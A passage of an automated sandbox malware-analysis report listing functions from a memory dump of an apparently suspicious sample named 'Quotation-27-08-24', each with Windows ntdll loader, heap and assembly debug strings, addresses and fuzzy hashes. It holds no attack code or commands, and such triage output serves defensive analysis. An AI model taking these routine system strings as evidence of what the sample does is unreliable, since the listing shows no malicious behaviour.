                                          • undeleted critical section in freed memory, xrefs: 00FD542B
                                          • 8, xrefs: 00FD52E3
                                          • Invalid debug info address of this critical section, xrefs: 00FD54B6
                                          • Critical section address, xrefs: 00FD5425, 00FD54BC, 00FD5534
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FD54E2
                                          • Critical section address., xrefs: 00FD5502
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: b36e04a27e4482893ce9c618b8de56fc1edbb8453218f896b0643e2aaa06719c
                                          • Instruction ID: eaeb93d6a9f5f94a82a86f983cac74755a115df821821a5bf751bbb3be9b6aaf
                                          • Opcode Fuzzy Hash: b36e04a27e4482893ce9c618b8de56fc1edbb8453218f896b0643e2aaa06719c
                                          • Instruction Fuzzy Hash: 4F81AEB1E00748EFDB20CF94C841BAEBBB6BB08B54F24411AF905BB280D775AD45EB51
                                          Function 00F929F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 00FD261F
                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00FD2624
                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00FD25EB
                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00FD2409
                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00FD2412
                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00FD22E4
                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00FD24C0
                                          • @, xrefs: 00FD259B
                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00FD2602
                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00FD2506
                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00FD2498
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                          • API String ID: 0-4009184096
                                          • Opcode ID: fc887e4cde7d23e287c81e72c6c80cc79eb646667ef3339086dff3e7115a1a23
                                          • Instruction ID: 690dca118aabf242a576773ee8486752485482800321df4d9531ea96e17ae99f
                                          • Opcode Fuzzy Hash: fc887e4cde7d23e287c81e72c6c80cc79eb646667ef3339086dff3e7115a1a23
                                          • Instruction Fuzzy Hash: 8B0272F2D002289BEF61DB14CC81BDDB7B8AF55314F0441DAAA09A7241DB749F84EF99
                                          Function 01008B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                          • API String ID: 0-2515994595
                                          • Opcode ID: 53579b43033335fc858399071e7abba2f4d371ebf3af620d14b35b61c1fcc54d
                                          • Instruction ID: f56ae4bac3671efd5e5a553f19d3fba44cd54f647389f07320e12207885c0097
                                          • Opcode Fuzzy Hash: 53579b43033335fc858399071e7abba2f4d371ebf3af620d14b35b61c1fcc54d
                                          • Instruction Fuzzy Hash: D451C4B19083059BE736EF188849BABBBE8FF84350F148A5FF99583181E770D504D792
                                          Function 01010274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          • Opcode ID: b486a415281ca1089b9b270edf9f4c70a8f76e236f29c687390c00a09af44c63
                                          • Instruction ID: 2ed4fd44619a60e12790c0e9143987238edb53be23f0fdd3dcb156dd5bc09dd8
                                          • Opcode Fuzzy Hash: b486a415281ca1089b9b270edf9f4c70a8f76e236f29c687390c00a09af44c63
                                          • Instruction Fuzzy Hash: E9D1CB31600685DFDB22DF68C841AAEBBF1FF4A710F088099F9C59B65AD739D984DB10
                                          Function 00FE89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                          Download Yara Rule
                                          Strings
                                          • HandleTraces, xrefs: 00FE8C8F
                                          • VerifierDlls, xrefs: 00FE8CBD
                                          • AVRF: -*- final list of providers -*- , xrefs: 00FE8B8F
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FE8A67
                                          • VerifierDebug, xrefs: 00FE8CA5
                                          • VerifierFlags, xrefs: 00FE8C50
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FE8A3D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          • Opcode ID: 4cce14ba025b015a588df9da22047f25a271ed441e567995fe89ac6b23bb0ef0
                                          • Instruction ID: cb6208a096968d032ac4d7d20576f4d89e5ace865e0f7d7164a4d6d4273b7bcb
                                          • Opcode Fuzzy Hash: 4cce14ba025b015a588df9da22047f25a271ed441e567995fe89ac6b23bb0ef0
                                          • Instruction Fuzzy Hash: D9916D72645791EFD721FF29CC81B1B77A5EB85790F140418F9896B281CB78EC02E7A2
                                          Function 00F6EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                          • API String ID: 0-1109411897
                                          • Opcode ID: b464d40c78abd3c57a0342d66c9a44ec83d22986d84b23dd60f818d4a5f04747
                                          • Instruction ID: 6cd08eabd05ee06bc649be3acfebfff168333eab10c38c33c0db9faeeba40b76
                                          • Opcode Fuzzy Hash: b464d40c78abd3c57a0342d66c9a44ec83d22986d84b23dd60f818d4a5f04747
                                          • Instruction Fuzzy Hash: 0FA26C75E0562ACFDB64CF14CD99BA9B7B1AF45310F2442E9D80DA7290DB31AE85EF00
                                          Function 00F963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: 889d8511e72dec88a52a5e71a1e4e6d6762e9264bbdec56283a69ddd13c42fe7
                                          • Instruction ID: 3801119917bf616ba2692abff4a2a3b716c0cf408c9790729238fc667c31a641
                                          • Opcode Fuzzy Hash: 889d8511e72dec88a52a5e71a1e4e6d6762e9264bbdec56283a69ddd13c42fe7
                                          • Instruction Fuzzy Hash: 51913771E003159BEB35DF58DC46BAA7BA1BB41B24F18012AF940AB3C1D779AC41FB91
                                          Function 00F92CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                          Download Yara Rule
                                          Strings
                                          • \WinSxS\, xrefs: 00F92E23
                                          • .Local\, xrefs: 00F92D91
                                          • @, xrefs: 00F92E4D
                                          • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 00FD279C
                                          • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 00FD276F
                                          • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 00FD2706
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                          • API String ID: 0-3926108909
                                          • Opcode ID: eb4352f656fe3165fbf7a52ccf818874834846abe333b180991887b06b1566ac
                                          • Instruction ID: ae7138f935ea9fa319ab32e2c85c9fc9bff495c973d5e9ac347265cfd3fefbc3
                                          • Opcode Fuzzy Hash: eb4352f656fe3165fbf7a52ccf818874834846abe333b180991887b06b1566ac
                                          • Instruction Fuzzy Hash: 5781BDB1504341AFEB61CF18C890A6BB7E5AF95710F04895EF884CB352D774DA44EBE2
                                          Function 00F5645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                          Download Yara Rule
                                          Strings
                                          • Getting the shim user exports failed with status 0x%08lx, xrefs: 00FB9A01
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FB9A11, 00FB9A3A
                                          • apphelp.dll, xrefs: 00F56496
                                          • Loading the shim user DLL failed with status 0x%08lx, xrefs: 00FB9A2A
                                          • LdrpInitShimEngine, xrefs: 00FB99F4, 00FB9A07, 00FB9A30
                                          • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 00FB99ED
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-204845295
                                          • Opcode ID: 1626673a0827db2d76281725bae6d4f620c1c1343625d73e3b2d621918ed8749
                                          • Instruction ID: d97340d517761305aaece9c519cde6963be2a114fb42a63602f2d0a4a0f1fe54
                                          • Opcode Fuzzy Hash: 1626673a0827db2d76281725bae6d4f620c1c1343625d73e3b2d621918ed8749
                                          • Instruction Fuzzy Hash: 1051E1716483049FD320EF24CC42BAB7BE8FB84754F40491AFA959B191D778E904EB93
                                          Function 00F9C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpInitializeImportRedirection, xrefs: 00FD8177, 00FD81EB
                                          • LdrpInitializeProcess, xrefs: 00F9C6C4
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F9C6C3
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 00FD8181, 00FD81F5
                                          • Loading import redirection DLL: '%wZ', xrefs: 00FD8170
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 00FD81E5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: 67c53bf3019ab5bc3b4b68da9f4a89a2667389ee29263137bfdc94a234acb07b
                                          • Instruction ID: b66adc755fc7a9950dffe3e2a76cf97fdd140967ea100822f3063f6ed697395e
                                          • Opcode Fuzzy Hash: 67c53bf3019ab5bc3b4b68da9f4a89a2667389ee29263137bfdc94a234acb07b
                                          • Instruction Fuzzy Hash: 0B31F7716443459BD324EF28DC46E1B7795FFC4B60F040568F884AB3D2DA28ED05E7A2
                                          Function 00F92674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlGetAssemblyStorageRoot, xrefs: 00FD2160, 00FD219A, 00FD21BA
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00FD2180
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00FD219F
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00FD21BF
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00FD2178
                                          • SXS: %s() passed the empty activation context, xrefs: 00FD2165
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: d80aad543ad5f0b01ef1a9146cc08bc595f08f8432eea0d49e8b122d556fc0e7
                                          • Instruction ID: 54ee6ab185872a6769adf7ee6e1a029a5702ed6d76c4e24846c9ee8333584a08
                                          • Opcode Fuzzy Hash: d80aad543ad5f0b01ef1a9146cc08bc595f08f8432eea0d49e8b122d556fc0e7
                                          • Instruction Fuzzy Hash: A031E532F4032477FB219A958C85F5E7A69DBA5B50F19406ABA04BB281D370DE00F6E2
                                          Function 00FA096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00FA2DF0: LdrInitializeThunk.NTDLL ref: 00FA2DFA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA0BA3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA0BB6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA0D60
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA0D74
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                          • String ID:
                                          • API String ID: 1404860816-0
                                          • Opcode ID: 0478cde6aac8655f50641cf0adc2b84787adb6b6cd8416e5be20c4128d4ec362
                                          • Instruction ID: dfaaacc936b7a2b28423cccc474f9ac33783388cd85b346ba002f698242cbdcc
                                          • Opcode Fuzzy Hash: 0478cde6aac8655f50641cf0adc2b84787adb6b6cd8416e5be20c4128d4ec362
                                          • Instruction Fuzzy Hash: F1427EB2900715DFDB20CF64C881BAAB7F5FF05310F1445AAE949DB241DB74AA84EF61
                                          Function 00F6A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: de4e6a050f2067f0cf56bcb8f3a2e463550f0c827a7118994abcd943d7912628
                                          • Instruction ID: 4f40497d74a3907b2374893b6a5d895f66b91f13b678f973bdcace9619614b50
                                          • Opcode Fuzzy Hash: de4e6a050f2067f0cf56bcb8f3a2e463550f0c827a7118994abcd943d7912628
                                          • Instruction Fuzzy Hash: 23C166755083868FC711CF28C540B6AB7E4FF84714F04896AF896AB261E778CA49EF53
                                          Function 00F98402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 00F98591
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F98421
                                          • LdrpInitializeProcess, xrefs: 00F98422
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F9855E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: 3ffcfbb878b652b1ed3c867af31f27cbaac45f91364a4ca2c4ceed03f8a62d63
                                          • Instruction ID: 70a612520a61db80f3603776ca4aa14da1716dcbfe6cb56a7afda2e6c04d88e4
                                          • Opcode Fuzzy Hash: 3ffcfbb878b652b1ed3c867af31f27cbaac45f91364a4ca2c4ceed03f8a62d63
                                          • Instruction Fuzzy Hash: B891BEB1508340AFEB21DF64CC41FABB7E8BF857A0F44492EF58492141E734D909AB62
                                          Function 00F9273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          • .Local, xrefs: 00F928D8
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00FD22B6
                                          • SXS: %s() passed the empty activation context, xrefs: 00FD21DE
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00FD21D9, 00FD22B1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: 57c904c25d582b0fc4960e6373f4afe080bec8e6672040fa2561c25cc034eca2
                                          • Instruction ID: 4d13b6e8b53a697bafb588b4c41119f8f895d6fd2757fec36935ecd447d141f2
                                          • Opcode Fuzzy Hash: 57c904c25d582b0fc4960e6373f4afe080bec8e6672040fa2561c25cc034eca2
                                          • Instruction Fuzzy Hash: F6A19131D00229ABEF65CF54DC84BA9B3B1BF58324F2541EAE808A7351D7309E80EF91
                                          Function 00F94AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlDeactivateActivationContext, xrefs: 00FD3425, 00FD3432, 00FD3451
                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00FD3437
                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00FD3456
                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00FD342A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                          • API String ID: 0-1245972979
                                          • Opcode ID: cee5160b126a9179515d92267800648f91a14a05b8f3a6ca078e96631b513a5b
                                          • Instruction ID: a7c23c04a003f42bebeb7786de791031282fe2136556e4828ec71ddf6053b000
                                          • Opcode Fuzzy Hash: cee5160b126a9179515d92267800648f91a14a05b8f3a6ca078e96631b513a5b
                                          • Instruction Fuzzy Hash: 98615B32A40B119FDB22CF18C841F2AB7A1EF91B60F18451AF9559B381D738FD01EB92
                                          Function 00F664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FC106B
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FC0FE5
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FC10AE
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FC1028
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          • Opcode ID: b37abb13d03d7b2abbed1bf30a552f41e6356b442c9e7b0417092e380ce33432
                                          • Instruction ID: b5eafde329260e7048152e8f5ba27dbaa265584c69e78aacdc622c8929250049
                                          • Opcode Fuzzy Hash: b37abb13d03d7b2abbed1bf30a552f41e6356b442c9e7b0417092e380ce33432
                                          • Instruction Fuzzy Hash: D371CFB19043459FCB20DF14C886F9B7FA8AF85764F040468F9498B186D778D989EBD2
                                          Function 00F8245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FCA9A2
                                          • apphelp.dll, xrefs: 00F82462
                                          • LdrpDynamicShimModule, xrefs: 00FCA998
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FCA992
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-176724104
                                          • Opcode ID: 11ee87239ff51c3436cbe34fc9a84605ad18df178392882b8d166569e7c2c88d
                                          • Instruction ID: 083bf3c1d4c2e13fd0bfcd87431c588693f2fa217dc5b30aab6bbe7c47a21913
                                          • Opcode Fuzzy Hash: 11ee87239ff51c3436cbe34fc9a84605ad18df178392882b8d166569e7c2c88d
                                          • Instruction Fuzzy Hash: DE313772A00306EBCB30AF599986F6BB7B4FB80718F25001DF840AB245C779AC81E791
                                          Function 00F729A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                          Download Yara Rule
                                          Strings
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00F7327D
                                          • HEAP[%wZ]: , xrefs: 00F73255
                                          • HEAP: , xrefs: 00F73264
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          • Opcode ID: 5ec0e0a5268afdd3458e23bc94ea3db712fd269dc1f667bed793b474c9b964e4
                                          • Instruction ID: 0180f6585960aba2cad07d43eebce09bf87c1ea4599fa22c6fddd25894ac9740
                                          • Opcode Fuzzy Hash: 5ec0e0a5268afdd3458e23bc94ea3db712fd269dc1f667bed793b474c9b964e4
                                          • Instruction Fuzzy Hash: 7992AD71E04249AFDB25CF68C440BADBBF1FF49310F14C05AE889AB351D739AA45EB51
                                          Function 00F70770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: ac13b4fbc41b5385e4a6a240ad006b383407433cb5a259e37af8431cfba78057
                                          • Instruction ID: cb3c91f128ed7f566885ae41a04544c5cfb14372b6f94245193d864d3a478054
                                          • Opcode Fuzzy Hash: ac13b4fbc41b5385e4a6a240ad006b383407433cb5a259e37af8431cfba78057
                                          • Instruction Fuzzy Hash: FBF1BB31A00606DFDB14CF68C985FAAB7B5FF44710F248169E44A9B381DB34ED81EB92
                                          Function 00F86962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
